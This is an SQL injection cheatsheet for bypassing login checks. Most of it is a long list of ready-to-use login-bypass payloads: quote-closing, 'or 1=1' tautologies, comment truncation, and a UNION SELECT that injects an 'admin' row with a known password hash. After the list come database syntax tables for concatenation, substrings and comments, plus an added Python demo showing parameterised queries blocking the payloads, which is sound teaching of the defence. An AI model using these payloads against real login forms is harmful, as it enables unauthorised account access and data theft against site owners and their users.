SQL Injection Cheatsheet

Bypass login - sql

admin' --
admin' -- -
admin' #
admin'/*
' or 1=1--
' or 1=1-- -
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

x' or 'x'='x

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
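
Why strings like these get past a login check, and why parameter binding stops them, as an added example that is not part of the original cheatsheet. It uses Python's sqlite3 with a constructed users table and password; the function names are hypothetical, and SQLite stands in for the databases listed on this page.

```python
import hashlib
import sqlite3

# Constructed sample inputs: three of the username strings listed above.
PAYLOADS = ["admin' --", "' or 1=1--", "admin' or '1'='1"]

def hash_pw(password):
    # Unsalted SHA-256 only keeps the demo short; real code uses a password KDF.
    return hashlib.sha256(password.encode()).hexdigest()

def make_db():
    """In-memory database with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", hash_pw("constructed-secret")))
    return db

def login_vulnerable(db, username, password):
    # Input is spliced into the SQL text, so a quote in `username` ends the
    # string literal and the rest is parsed as SQL.
    sql = ("SELECT 1 FROM users WHERE username = '" + username +
           "' AND pw_hash = '" + hash_pw(password) + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed SQL: treat as a failed login

def login_parameterized(db, username, password):
    # Placeholders send the values separately from the statement, so quotes
    # and comment markers are compared as data and never parsed.
    sql = "SELECT 1 FROM users WHERE username = ? AND pw_hash = ?"
    return db.execute(sql, (username, hash_pw(password))).fetchone() is not None

def compare_logins(payloads=PAYLOADS):
    """Map each payload to (vulnerable_result, parameterized_result)."""
    db = make_db()
    return {p: (login_vulnerable(db, p, "wrong"),
                login_parameterized(db, p, "wrong"))
            for p in payloads}

if __name__ == "__main__":
    for payload, (vuln, safe) in compare_logins().items():
        print(f"{payload!r:24} vulnerable={vuln} parameterized={safe}")
```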

String concatenation

Database      String Concatenation
Oracle        'foo'||'bar'
Microsoft     'foo'+'bar'
PostgreSQL    'foo'||'bar'
MySQL         CONCAT('foo','bar')

Substring

Extract part of the string abcdefg. Each of the expressions below returns ef: 5 is the start position and 2 is the number of characters to return from there.

Database      Substring
Oracle        SUBSTR('abcdefg', 5, 2)
Microsoft     SUBSTRING('abcdefg', 5, 2)
PostgreSQL    SUBSTRING('abcdefg', 5, 2)
MySQL         SUBSTRING('abcdefg', 5, 2)

Comments

Database      Comments
Oracle        --comment
Microsoft     --comment
              /*comment*/
PostgreSQL    --comment
              /*comment*/
MySQL         -- comment
              /*comment*/
              #comment

Observe the space after the -- in the MySQL form.